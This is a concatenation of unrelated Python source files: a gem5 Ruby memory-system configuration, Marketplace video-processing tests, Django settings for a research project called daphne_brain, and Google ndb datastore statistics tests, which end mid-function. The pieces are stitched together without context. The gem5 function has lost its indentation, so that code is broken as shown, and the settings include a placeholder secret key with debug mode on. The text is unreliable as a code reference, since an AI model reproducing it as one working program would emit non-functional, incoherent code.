def create_topology(controllers, options):
    """ Called from create_system in configs/ruby/<protocol>.py
        Must return an object which is a subclass of BaseTopology
        found in configs/topologies/BaseTopology.py
        This is a wrapper for the legacy topologies.
    """
    # The topology class is chosen at runtime from --topology; the module
    # of the same name is imported dynamically and instantiated with the
    # list of controllers.
    exec "import %s as Topo" % options.topology
    topology = eval("Topo.%s(controllers)" % options.topology)
    return topology
def create_system(options, system, piobus = None, dma_ports = []):
system.ruby = RubySystem(clock = options.clock,
stats_filename = options.ruby_stats,
no_mem_vec = options.use_map)
ruby = system.ruby
protocol = buildEnv['PROTOCOL']
exec "import %s" % protocol
try:
(cpu_sequencers, dir_cntrls, topology) = \
eval("%s.create_system(options, system, piobus, dma_ports, ruby)"
% protocol)
except:
print "Error: could not create sytem for ruby protocol %s" % protocol
raise
# Create a port proxy for connecting the system port. This is
# independent of the protocol and kept in the protocol-agnostic
# part (i.e. here).
sys_port_proxy = RubyPortProxy(ruby_system = ruby)
# Give the system port proxy a SimObject parent without creating a
# full-fledged controller
system.sys_port_proxy = sys_port_proxy
# Connect the system port for loading of binaries etc
system.system_port = system.sys_port_proxy.slave
#
# Set the network classes based on the command line options
#
if options.garnet_network == "fixed":
class NetworkClass(GarnetNetwork_d): pass
class IntLinkClass(GarnetIntLink_d): pass
class ExtLinkClass(GarnetExtLink_d): pass
class RouterClass(GarnetRouter_d): pass
elif options.garnet_network == "flexible":
class NetworkClass(GarnetNetwork): pass
class IntLinkClass(GarnetIntLink): pass
class ExtLinkClass(GarnetExtLink): pass
class RouterClass(GarnetRouter): pass
else:
class NetworkClass(SimpleNetwork): pass
class IntLinkClass(SimpleIntLink): pass
class ExtLinkClass(SimpleExtLink): pass
class RouterClass(BasicRouter): pass
#
# Important: the topology must be instantiated before the network and after
# the controllers. Hence the separation between topology definition and
# instantiation.
#
# gem5 SimObject defined in src/mem/ruby/network/Network.py
net_topology = Topology()
net_topology.description = topology.description
routers, int_links, ext_links = topology.makeTopology(options,
IntLinkClass, ExtLinkClass, RouterClass)
net_topology.routers = routers
net_topology.int_links = int_links
net_topology.ext_links = ext_links
if options.network_fault_model:
assert(options.garnet_network == "fixed")
fault_model = FaultModel()
network = NetworkClass(ruby_system = ruby, topology = net_topology,\
enable_fault_model=True, fault_model = fault_model)
else:
network = NetworkClass(ruby_system = ruby, topology = net_topology)
#
# Loop through the directory controlers.
# Determine the total memory size of the ruby system and verify it is equal
# to physmem. However, if Ruby memory is using sparse memory in SE
# mode, then the system should not back-up the memory state with
# the Memory Vector and thus the memory size bytes should stay at 0.
# Also set the numa bits to the appropriate values.
#
total_mem_size = MemorySize('0B')
dir_bits = int(math.log(options.num_dirs, 2))
if options.numa_high_bit:
numa_bit = options.numa_high_bit
else:
# if not specified, use the lowest bits above the block offest
if dir_bits > 0:
# add 5 because bits 0-5 are the block offset
numa_bit = dir_bits + 5
else:
numa_bit = 6
for dir_cntrl in dir_cntrls:
total_mem_size.value += dir_cntrl.directory.size.value
dir_cntrl.directory.numa_high_bit = numa_bit
phys_mem_size = 0
for mem in system.memories.unproxy(system):
phys_mem_size += long(mem.range.second) - long(mem.range.first) + 1
assert(total_mem_size.value == phys_mem_size)
ruby_profiler = RubyProfiler(ruby_system = ruby,
num_of_sequencers = len(cpu_sequencers))
ruby.network = network
ruby.profiler = ruby_profiler
ruby.mem_size = total_mem_size
ruby._cpu_ruby_ports = cpu_sequencers
ruby.random_seed = options.random_seed
| |
import os
import stat
import tempfile
from mock import Mock, patch
from nose import SkipTest
from nose.tools import eq_
import waffle
from django.conf import settings
import mkt
import mkt.site.tests
from lib.video import dummy, ffmpeg, get_library, totem
from lib.video.tasks import resize_video
from mkt.developers.models import UserLog
from mkt.site.fixtures import fixture
from mkt.site.storage_utils import (copy_stored_file, local_storage,
private_storage)
from mkt.site.tests.test_utils_ import get_image_path
from mkt.users.models import UserProfile
from mkt.webapps.models import Preview, Webapp
# Sample inputs: a real (truncated) WebM video and an image that the video
# backends are expected to reject.
files = {
    'good': os.path.join(os.path.dirname(__file__),
                         'fixtures/disco-truncated.webm'),
    'bad': get_image_path('mozilla.png'),
}

# Canned ffmpeg output used to exercise the metadata parser without
# shelling out (older ffmpeg banner format).
older_output = """
Input #0, matroska,webm, from 'lib/video/fixtures/disco-truncated.webm':
Duration: 00:00:10.00, start: 0.000000, bitrate: 298 kb/s
Stream #0:0(eng): Video: vp8, yuv420p, 640x360, SAR 1:1 DAR 16:9,
Stream #0:1(eng): Audio: vorbis, 44100 Hz, stereo, s16 (default)
"""

# A newer/alternative ffmpeg banner format (metadata block style).
other_output = """
Input #0, matroska, from 'disco-truncated.webm':
Metadata:
doctype : webm
"""

# Canned totem-video-indexer output for a valid video...
totem_indexer_good = """
TOTEM_INFO_DURATION=10
TOTEM_INFO_HAS_VIDEO=True
TOTEM_INFO_VIDEO_WIDTH=640
TOTEM_INFO_VIDEO_HEIGHT=360
TOTEM_INFO_VIDEO_CODEC=VP8 video
TOTEM_INFO_FPS=25
TOTEM_INFO_HAS_AUDIO=True
TOTEM_INFO_AUDIO_BITRATE=128
TOTEM_INFO_AUDIO_CODEC=Vorbis
TOTEM_INFO_AUDIO_SAMPLE_RATE=44100
TOTEM_INFO_AUDIO_CHANNELS=Stereo
"""

# ...and for a file that is not a video at all.
totem_indexer_bad = """
TOTEM_INFO_HAS_VIDEO=False
TOTEM_INFO_HAS_AUDIO=False
"""
class TestFFmpegVideo(mkt.site.tests.TestCase):
    """Metadata extraction for a valid .webm via the ffmpeg backend.

    ``_call`` is mocked, so these tests parse the canned ffmpeg banners
    above instead of shelling out to the binary.
    """

    def setUp(self):
        self.video = ffmpeg.Video(files['good'])
        # Skip the whole class when ffmpeg is not installed.
        if not ffmpeg.Video.library_available():
            raise SkipTest
        self.video._call = Mock()
        self.video._call.return_value = older_output

    def test_meta(self):
        self.video.get_meta()
        eq_(self.video.meta['formats'], ['matroska', 'webm'])
        eq_(self.video.meta['duration'], 10.0)
        eq_(self.video.meta['dimensions'], (640, 360))

    def test_valid(self):
        self.video.get_meta()
        assert self.video.is_valid()

    def test_dev_valid(self):
        # Newer ffmpeg builds emit a different banner (other_output).
        self.video._call.return_value = other_output
        self.video.get_meta()
        eq_(self.video.meta['formats'], ['webm'])

    # These tests can be a little bit slow, to say the least so they are
    # skipped. Un-skip them if you want.
    def test_screenshot(self):
        raise SkipTest
        # Unreachable while the SkipTest above is in place (intentional).
        self.video.get_meta()
        try:
            screenshot = self.video.get_screenshot(mkt.ADDON_PREVIEW_SIZES[0])
            assert os.stat(screenshot)[stat.ST_SIZE]
        finally:
            os.remove(screenshot)

    def test_encoded(self):
        raise SkipTest
        self.video.get_meta()
        try:
            video = self.video.get_encoded(mkt.ADDON_PREVIEW_SIZES[0])
            assert os.stat(video)[stat.ST_SIZE]
        finally:
            os.remove(video)
class TestBadFFmpegVideo(mkt.site.tests.TestCase):
    """The ffmpeg backend must reject a PNG passed off as a video."""

    def setUp(self):
        self.video = ffmpeg.Video(files['bad'])
        if not self.video.library_available():
            raise SkipTest
        # Real (unmocked) ffmpeg call: the image is probed for metadata.
        self.video.get_meta()

    def test_meta(self):
        # ffmpeg identifies still images as the 'image2' demuxer.
        eq_(self.video.meta['formats'], ['image2'])
        assert not self.video.is_valid()

    def test_valid(self):
        assert not self.video.is_valid()

    def test_screenshot(self):
        # Operations on an invalid video are guarded by assertions.
        self.assertRaises(AssertionError, self.video.get_screenshot,
                          mkt.ADDON_PREVIEW_SIZES[0])

    def test_encoded(self):
        self.assertRaises(AssertionError, self.video.get_encoded,
                          mkt.ADDON_PREVIEW_SIZES[0])
class TestTotemVideo(mkt.site.tests.TestCase):
    """Metadata parsing for the totem backend (indexer output is mocked)."""

    def setUp(self):
        self.video = totem.Video(files['good'])
        self.video._call_indexer = Mock()

    def test_meta(self):
        self.video._call_indexer.return_value = totem_indexer_good
        self.video.get_meta()
        # NOTE(review): unlike the ffmpeg backend, 'formats' here is a bare
        # codec string rather than a list, and 'duration' a string —
        # presumably the totem parser's raw values; confirm intentional.
        eq_(self.video.meta['formats'], 'VP8')
        eq_(self.video.meta['duration'], '10')

    def test_valid(self):
        self.video._call_indexer = Mock()
        self.video._call_indexer.return_value = totem_indexer_good
        self.video.get_meta()
        assert self.video.is_valid()

    def test_not_valid(self):
        self.video._call_indexer.return_value = totem_indexer_bad
        self.video.get_meta()
        assert not self.video.is_valid()
@patch('lib.video.totem.Video.library_available')
@patch('lib.video.ffmpeg.Video.library_available')
@patch.object(settings, 'VIDEO_LIBRARIES',
              ['lib.video.totem', 'lib.video.ffmpeg'])
def test_choose(ffmpeg_, totem_):
    """get_library() picks the first *available* backend in
    VIDEO_LIBRARIES order.

    Mock arguments are injected bottom-up, so ``ffmpeg_`` corresponds to
    the inner @patch and ``totem_`` to the outer one; the patch.object
    replaces the setting with a fixed value and injects nothing.
    """
    ffmpeg_.return_value = True
    totem_.return_value = True
    eq_(get_library(), totem.Video)
    # totem unavailable -> fall through to ffmpeg.
    totem_.return_value = False
    eq_(get_library(), ffmpeg.Video)
    # No backend available -> None.
    ffmpeg_.return_value = False
    eq_(get_library(), None)
class TestTask(mkt.site.tests.TestCase):
    """resize_video task behaviour: error handling, the video-encode
    waffle switch, and rejection of non-video input."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        super(TestTask, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.preview = Preview.objects.create(
            addon=self.app, thumbnail_path=tempfile.mkstemp()[1],
            image_path=tempfile.mkstemp()[1])
        # Copy files to private storage where `resize_video` expects it.
        self.tmp_good = tempfile.NamedTemporaryFile(suffix='.webm').name
        self.tmp_bad = tempfile.NamedTemporaryFile(suffix='.png').name
        copy_stored_file(files['good'], self.tmp_good,
                         src_storage=local_storage,
                         dst_storage=private_storage)
        copy_stored_file(files['bad'], self.tmp_bad,
                         src_storage=local_storage,
                         dst_storage=private_storage)

    def tearDown(self):
        private_storage.delete(self.tmp_good)
        private_storage.delete(self.tmp_bad)
        super(TestTask, self).tearDown()

    @patch('lib.video.tasks.Preview.delete')
    @patch('lib.video.tasks._resize_video')
    def test_resize_error(self, _resize_video, _preview_delete):
        # A raising resize must delete the preview and log a VIDEO_ERROR
        # against the user, then re-raise.
        user = UserProfile.objects.create(email='a@a.com')
        _resize_video.side_effect = ValueError
        with self.assertRaises(ValueError):
            resize_video(self.tmp_good, self.preview.pk, user_pk=user.pk,
                         lib=dummy.Video)
        assert _preview_delete.called
        assert UserLog.objects.filter(
            user=user, activity_log__action=mkt.LOG.VIDEO_ERROR.id).exists()

    @patch('lib.video.tasks.Preview.delete')
    @patch('lib.video.tasks._resize_video')
    def test_resize_failed(self, _resize_video, _preview_delete):
        # A resize returning None (no output) also deletes the preview.
        user = UserProfile.objects.create(email='a@a.com')
        _resize_video.return_value = None
        resize_video(self.tmp_good, self.preview.pk, user_pk=user.pk,
                     lib=dummy.Video)
        assert _preview_delete.called

    @patch('lib.video.tasks.Preview.save')
    @patch('lib.video.ffmpeg.Video.get_encoded')
    def test_resize_video_no_encode(self, get_encoded, _preview_save):
        # NOTE(review): `.update(name=..., active=False)` rewrites *all*
        # existing Switch rows — presumably a single fixture switch exists;
        # confirm this should not be `.create(...)`.
        waffle.models.Switch.objects.update(name='video-encode', active=False)
        resize_video(self.tmp_good, self.preview.pk, lib=dummy.Video)
        assert not get_encoded.called
        assert _preview_save.called

    @patch('lib.video.tasks.Preview.save')
    @patch('lib.video.totem.Video.get_encoded')
    def test_resize_video(self, get_encoded, _preview_save):
        name = tempfile.mkstemp()[1]
        get_encoded.return_value = name
        resize_video(self.tmp_good, self.preview.pk, lib=dummy.Video)
        assert _preview_save.called

    @patch('lib.video.tasks.Preview.save')
    def test_resize_image(self, _preview_save):
        # Non-video input: no sizes recorded, preview not saved.
        resize_video(self.tmp_bad, self.preview.pk, lib=dummy.Video)
        eq_(self.preview.sizes, {})
        assert not _preview_save.called
| |
"""
Django settings for daphne_brain project.
Generated by 'django-admin startproject' using Django 1.10.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this placeholder value is committed to source control; it
# should be read from the environment in any real deployment.
SECRET_KEY = 'aaaaa'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Host/domain names this site can serve.
# Bug fix: the comma after 'daphne_brain' was missing, so Python's implicit
# string-literal concatenation silently produced the bogus host
# 'daphne_braindaphne-at-dev.selva-research.com' and dropped both intended
# entries from the list.
ALLOWED_HOSTS = ['3.128.235.245', 'localhost', '127.0.0.1', 'www.selva-research.com',
                 'selva-research.engr.tamu.edu', 'dev.selva-research.com', 'daphne', 'daphne_brain',
                 'daphne-at-dev.selva-research.com', 'daphne-at.selva-research.com']
# Trust the Host header forwarded by the reverse proxy (the proxy must set
# and sanitize X-Forwarded-Host itself).
USE_X_FORWARDED_HOST = True

# ACTIVE_MODULES = ['EDL', 'EOSS', 'AT', 'example_problem']
ACTIVE_MODULES = ['EOSS']

# NOTE(review): developer-specific absolute path — presumably only used by
# the EDL module; confirm before deploying elsewhere.
EDL_PATH = '/Users/ssantini/Code/'

# Application definition

INSTALLED_APPS = [
    'channels',
    'corsheaders',
    'daphne_context',
    'example_problem',
    'EOSS',
    'EDL',
    'AT',
    'auth_API',
    'experiment',
    'experiment_at',
    'iFEED_API',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework'
]

MIDDLEWARE = [
    # CorsMiddleware must run before CommonMiddleware so CORS headers are
    # added to every response, including redirects and errors.
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'daphne_brain.tamu_subdomains_session.TamuSubdomainsSessionMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'daphne_brain.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'daphne_brain.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# Credentials come from the environment; a missing variable raises
# KeyError at import time (fail-fast by design).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'daphne',
        'USER': os.environ['USER'],
        'PASSWORD': os.environ['PASSWORD'],
        'HOST': os.environ['POSTGRES_HOST'],
        'PORT': os.environ['POSTGRES_PORT'],
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# CORS & CSRF
# Origins allowed to make credentialed cross-site requests; keep the two
# tuples below in sync.
CORS_ORIGIN_WHITELIST = (
    'http://daphne.engr.tamu.edu',
    'http://localhost:8080',
    'http://dev.selva-research.com'
)
CORS_ALLOW_CREDENTIALS = True
CSRF_TRUSTED_ORIGINS = (
    'http://daphne.engr.tamu.edu',
    'http://localhost:8080',
    'http://dev.selva-research.com'
)
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')

# django-channels layer backed by Redis; host/port come from the
# environment (KeyError at import time if unset).
CHANNEL_LAYERS = {
    "default": {
        "BACKEND": "channels_redis.core.RedisChannelLayer",
        "CONFIG": {
            "hosts": [(os.environ['REDIS_HOST'], os.environ['REDIS_PORT'])],
        }
    },
}

# ASGI_APPLICATION should be set to your outermost router
ASGI_APPLICATION = 'daphne_brain.asgi.application'
# Databases for Daphne
# SQLAlchemy-style connection descriptors (keys mirror
# sqlalchemy.engine.url.URL arguments).
ALCHEMY_DATABASE = {
    'drivername': 'postgresql+psycopg2',
    'host': os.environ['POSTGRES_HOST'],
    'port': os.environ['POSTGRES_PORT'],
    'username': os.environ['USER'],
    'password': os.environ['PASSWORD'],
    'database': 'daphne'
}
EDL_DATABASE = {
    'drivername': 'postgresql+psycopg2',
    'host': os.environ['POSTGRES_HOST'],
    'port': os.environ['POSTGRES_PORT'],
    'username': os.environ['USER'],
    'password': os.environ['PASSWORD'],
    'database': 'edldatabase'
}
ECLSS_DATABASE = {
    # NOTE(review): 'postgres' is a legacy SQLAlchemy dialect alias
    # (removed in SQLAlchemy 1.4); the other configs use
    # 'postgresql+psycopg2' — confirm the installed SQLAlchemy accepts it.
    'drivername': 'postgres',
    'host': 'www.selva-research.com',
    'port': '5432',
    'username': os.environ['SQL_USER'],
    'password': os.environ['SQL_PASSWORD'],
    'database': 'eclss'
}

# Session configuration
# SESSION_ENGINE = "merge_session.merge_db"

# Email
# Console backend: outgoing mail is printed to stdout, not sent.
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEFAULT_FROM_EMAIL = 'Daphne Admin <daphne@selva-research.com>'

# AWS
DEPLOYMENT_TYPE = os.environ['DEPLOYMENT_TYPE']
# Logging
# All application loggers share the same pair of handlers: a DEBUG-level
# file under BASE_DIR/logs (the directory must exist) and the console.
# Most loggers are throttled to ERROR; only 'debugging' emits DEBUG.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
        },
        'simple': {
            'format': '[%(asctime)s] - %(name)s - %(levelname)s - %(message)s'
        },
        'standard': {
            'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
            'datefmt': "%Y/%m/%d %H:%M:%S"
        },
    },
    'handlers': {
        'file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': BASE_DIR + '/logs/daphne.log',
            'formatter': 'standard',
        },
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'standard',
        },
        'null': {
            'class': 'logging.NullHandler',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['file', 'console'],
            'level': 'ERROR',
            'propagate': True,
        },
        'iFEED': {
            'handlers': ['file', 'console'],
            'level': 'ERROR',
            'propagate': True,
        },
        'VASSAR': {
            'handlers': ['file', 'console'],
            'level': 'ERROR',
            'propagate': True,
        },
        'critic': {
            'handlers': ['file', 'console'],
            'level': 'ERROR',
            'propagate': True,
        },
        'data-mining': {
            'handlers': ['file', 'console'],
            'level': 'ERROR',
            'propagate': True,
        },
        'debugging': {
            'handlers': ['file', 'console'],
            'level': 'DEBUG',
            'propagate': True,
        },
        'config': {
            'handlers': ['file', 'console'],
            'level': 'ERROR',
            'propagate': True,
        },
    },
}
| |
#
# Copyright 2008 The ndb Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for stats.py."""
import datetime
import os
from .google_imports import datastore
from .google_test_imports import unittest
from . import stats
from . import test_utils
class StatsTests(test_utils.NDBTest):
def setUp(self):
    """Set up test infrastructure and seed the datastore with one entity
    per statistic kind."""
    super(StatsTests, self).setUp()
    self.PopulateStatEntities()

# Module under test.  NOTE(review): presumably consumed by the NDBTest
# base class — confirm against test_utils.
the_module = stats
def PopulateStatEntities(self):
    """Insert stat entities into Cloud Datastore.

    Entities are written in a fixed order (one spec per original call)
    so the query-based assertions in the individual tests see stable,
    deterministic results.
    """
    all_stats = dict(has_entity_bytes=True,
                     has_builtin_index_stats=True,
                     has_composite_index_stats=True)
    builtin_stats = dict(has_entity_bytes=True,
                         has_builtin_index_stats=True)
    entity_bytes = dict(has_entity_bytes=True)
    specs = [
        # GlobalStat
        (stats.GlobalStat.STORED_KIND_NAME, dict(all_stats)),
        # NamespaceStat
        (stats.NamespaceStat.STORED_KIND_NAME,
         dict(subject_namespace='name-space', **all_stats)),
        # KindStat
        (stats.KindStat.STORED_KIND_NAME,
         dict(kind_name='foo', **all_stats)),
        (stats.KindStat.STORED_KIND_NAME,
         dict(kind_name='foo2', **all_stats)),
        # KindRootEntityStat
        (stats.KindRootEntityStat.STORED_KIND_NAME,
         dict(kind_name='foo3', **entity_bytes)),
        (stats.KindRootEntityStat.STORED_KIND_NAME,
         dict(kind_name='foo4', **entity_bytes)),
        # KindNonRootEntityStat
        (stats.KindNonRootEntityStat.STORED_KIND_NAME,
         dict(kind_name='foo5', **entity_bytes)),
        (stats.KindNonRootEntityStat.STORED_KIND_NAME,
         dict(kind_name='foo6', **entity_bytes)),
        # PropertyTypeStat
        (stats.PropertyTypeStat.STORED_KIND_NAME,
         dict(property_type='pt1', **builtin_stats)),
        (stats.PropertyTypeStat.STORED_KIND_NAME,
         dict(property_type='pt2', **builtin_stats)),
        # KindPropertyTypeStat
        (stats.KindPropertyTypeStat.STORED_KIND_NAME,
         dict(kind_name='foo1', property_type='pt1', **builtin_stats)),
        (stats.KindPropertyTypeStat.STORED_KIND_NAME,
         dict(kind_name='foo1', property_type='pt2', **builtin_stats)),
        (stats.KindPropertyTypeStat.STORED_KIND_NAME,
         dict(kind_name='foo2', property_type='pt2', **builtin_stats)),
        # KindPropertyNameStat
        (stats.KindPropertyNameStat.STORED_KIND_NAME,
         dict(kind_name='foo11', property_name='pn1', **builtin_stats)),
        (stats.KindPropertyNameStat.STORED_KIND_NAME,
         dict(kind_name='foo11', property_name='pn2', **builtin_stats)),
        (stats.KindPropertyNameStat.STORED_KIND_NAME,
         dict(kind_name='foo21', property_name='pn2', **builtin_stats)),
        # KindPropertyNamePropertyTypeStat
        (stats.KindPropertyNamePropertyTypeStat.STORED_KIND_NAME,
         dict(kind_name='foo12', property_type='pt1', property_name='pn1',
              **builtin_stats)),
        (stats.KindPropertyNamePropertyTypeStat.STORED_KIND_NAME,
         dict(kind_name='foo12', property_type='pt2', property_name='pn2',
              **builtin_stats)),
        (stats.KindPropertyNamePropertyTypeStat.STORED_KIND_NAME,
         dict(kind_name='foo22', property_type='pt2', property_name='pn2',
              **builtin_stats)),
        # KindCompositeIndexStat
        (stats.KindCompositeIndexStat.STORED_KIND_NAME,
         dict(kind_name='foo12', composite_index_id=1)),
        (stats.KindCompositeIndexStat.STORED_KIND_NAME,
         dict(kind_name='foo12', composite_index_id=2)),
        (stats.KindCompositeIndexStat.STORED_KIND_NAME,
         dict(kind_name='foo22', composite_index_id=3)),
    ]
    for kind, kwargs in specs:
        self.CreateStatEntity(kind, **kwargs)
def CreateStatEntity(self,
                     kind,
                     kind_name=None,
                     property_type=None,
                     property_name=None,
                     subject_namespace=None,
                     composite_index_id=None,
                     has_entity_bytes=None,
                     has_builtin_index_stats=None,
                     has_composite_index_stats=None):
    """Create a single Statistic datastore entity.

    Args:
      kind: The name of the kind to store.
      kind_name: The value of the 'kind_name' property to set on the entity.
      property_type: The value of the 'property_type' property to set on
        the entity.
      property_name: The value of the 'property_name' property to set on
        the entity.
      subject_namespace: The namespace for NamespaceStat entities.
      composite_index_id: The index id of composite index.
      has_entity_bytes: The stat has the entity_bytes property.
      has_builtin_index_stats: The stat entity has builtin_index_bytes and
        builtin_index_count.
      has_composite_index_stats: The stat entity has composite_index_bytes
        and composite_index_count.
    """
    entity = datastore.Entity(kind)
    # Fixed baseline values shared by every seeded stat entity.
    entity['bytes'] = 4
    entity['count'] = 2
    entity['timestamp'] = datetime.datetime.utcfromtimestamp(40)
    if has_entity_bytes:
        entity['entity_bytes'] = 2
    if has_builtin_index_stats:
        entity['builtin_index_count'] = 3
        entity['builtin_index_bytes'] = 1
    if has_composite_index_stats:
        entity['composite_index_count'] = 2
        entity['composite_index_bytes'] = 1
    # Optional identifying properties: only set when a value was supplied.
    optional_props = (('kind_name', kind_name),
                      ('property_type', property_type),
                      ('property_name', property_name),
                      ('subject_namespace', subject_namespace),
                      ('index_id', composite_index_id))
    for prop, value in optional_props:
        if value is not None:
            entity[prop] = value
    datastore.Put(entity)
def testGlobalStat(self):
    """Test fetching the global stat singleton."""
    res = stats.GlobalStat.query().fetch()
    # Exactly one GlobalStat entity was seeded in PopulateStatEntities,
    # with all index stats populated.
    self.assertEquals(1, len(res))
    self.assertEquals(4, res[0].bytes)
    self.assertEquals(2, res[0].entity_bytes)
    self.assertEquals(3, res[0].builtin_index_count)
    self.assertEquals(1, res[0].builtin_index_bytes)
    self.assertEquals(2, res[0].composite_index_count)
    self.assertEquals(1, res[0].composite_index_bytes)
def testNamespaceStat(self):
    """Test fetching the per-namespace stat entity."""
    # (Docstring fixed: it previously said "global stat singleton",
    # copy-pasted from testGlobalStat.)
    res = stats.NamespaceStat.query().fetch()
    self.assertEquals(1, len(res))
    self.assertEquals(4, res[0].bytes)
    self.assertEquals('name-space', res[0].subject_namespace)
    self.assertEquals(2, res[0].entity_bytes)
    self.assertEquals(3, res[0].builtin_index_count)
    self.assertEquals(1, res[0].builtin_index_bytes)
    self.assertEquals(2, res[0].composite_index_count)
    self.assertEquals(1, res[0].composite_index_bytes)
def testKindStat(self):
    """Test fetching the Kind stats."""
    res = stats.KindStat.query().fetch()
    # Results come back ordered by kind name.
    self.assertEqual(2, len(res))
    self.assertEqual('foo', res[0].kind_name)
    self.assertEqual('foo2', res[1].kind_name)
    self.assertEqual(2, res[0].entity_bytes)
    self.assertEqual(3, res[0].builtin_index_count)
    self.assertEqual(1, res[0].builtin_index_bytes)
    self.assertEqual(2, res[0].composite_index_count)
    self.assertEqual(1, res[0].composite_index_bytes)
def testKindRootEntityStat(self):
    """Test fetching the Kind root entity stats."""
    res = stats.KindRootEntityStat.query().fetch()
    self.assertEqual(2, len(res))
    self.assertEqual('foo3', res[0].kind_name)
    self.assertEqual('foo4', res[1].kind_name)
    self.assertEqual(2, res[0].entity_bytes)
def testKindNonRootEntityStat(self):
    """Test fetching the Kind non-root entity stats."""
    res = stats.KindNonRootEntityStat.query().fetch()
    self.assertEqual(2, len(res))
    self.assertEqual('foo5', res[0].kind_name)
    self.assertEqual('foo6', res[1].kind_name)
    self.assertEqual(2, res[0].entity_bytes)
def testPropertyTypeStat(self):
    """Test fetching the property type stats."""
    res = stats.PropertyTypeStat.query().fetch()
    self.assertEqual(2, len(res))
    self.assertEqual('pt1', res[0].property_type)
    self.assertEqual('pt2', res[1].property_type)
    self.assertEqual(2, res[0].entity_bytes)
    self.assertEqual(3, res[0].builtin_index_count)
    self.assertEqual(1, res[0].builtin_index_bytes)
def testKindPropertyTypeStat(self):
    """Test fetching the (kind, property type) stats."""
    res = stats.KindPropertyTypeStat.query().fetch()
    self.assertEqual(3, len(res))
    self.assertEqual('foo1', res[0].kind_name)
    self.assertEqual('pt1', res[0].property_type)
    self.assertEqual('foo1', res[1].kind_name)
    self.assertEqual('pt2', res[1].property_type)
    self.assertEqual('foo2', res[2].kind_name)
    self.assertEqual('pt2', res[2].property_type)
    self.assertEqual(2, res[0].entity_bytes)
    self.assertEqual(3, res[0].builtin_index_count)
    self.assertEqual(1, res[0].builtin_index_bytes)
    # Filtering by kind narrows to the matching stat row only.
    query = stats.KindPropertyTypeStat.query(
        stats.KindPropertyTypeStat.kind_name == 'foo2')
    res = query.fetch()
    self.assertEqual(1, len(res))
    self.assertEqual('foo2', res[0].kind_name)
def testKindPropertyNameStat(self):
    """Test fetching the (kind, property name) type stats."""
    res = stats.KindPropertyNameStat.query().fetch()
    self.assertEqual(3, len(res))
    self.assertEqual('foo11', res[0].kind_name)
    self.assertEqual('pn1', res[0].property_name)
    self.assertEqual('foo11', res[1].kind_name)
    self.assertEqual('pn2', res[1].property_name)
    self.assertEqual('foo21', res[2].kind_name)
    self.assertEqual('pn2', res[2].property_name)
    self.assertEqual(2, res[0].entity_bytes)
    self.assertEqual(3, res[0].builtin_index_count)
    self.assertEqual(1, res[0].builtin_index_bytes)
    # Filtering by kind narrows to the matching stat row only.
    query = stats.KindPropertyNameStat.query(
        stats.KindPropertyNameStat.kind_name == 'foo21')
    res = query.fetch()
    self.assertEqual(1, len(res))
    self.assertEqual('foo21', res[0].kind_name)
def testKindPropertyNamePropertyTypeStat(self):
    """Test fetching the (kind, property name, property type) stats."""
    res = stats.KindPropertyNamePropertyTypeStat.query().fetch()
    self.assertEqual(3, len(res))
    self.assertEqual('foo12', res[0].kind_name)
